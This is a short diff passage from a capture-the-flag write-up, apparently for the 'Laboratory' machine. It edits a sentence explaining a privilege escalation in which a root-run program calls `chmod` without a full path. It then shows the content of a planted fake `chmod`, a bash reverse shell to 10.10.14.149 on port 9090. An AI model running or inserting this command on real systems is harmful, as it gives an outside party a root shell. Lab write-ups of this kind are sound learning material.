angelopassaro/writeup/laboratory/laboratory.md

 ```

-So the executable run `chmod` as `root` also the `chmod` is executing  without the full path.
-So i can create a new file called `chmod` with the following content
+So the executable run `chmod` as `root`, the `chmod` is executing  without the full path, so i can create a new file called `chmod` with the following content

 >bash -c \`exec bash -i &>/dev/tcp/10.10.14.149/9090 >&1 \`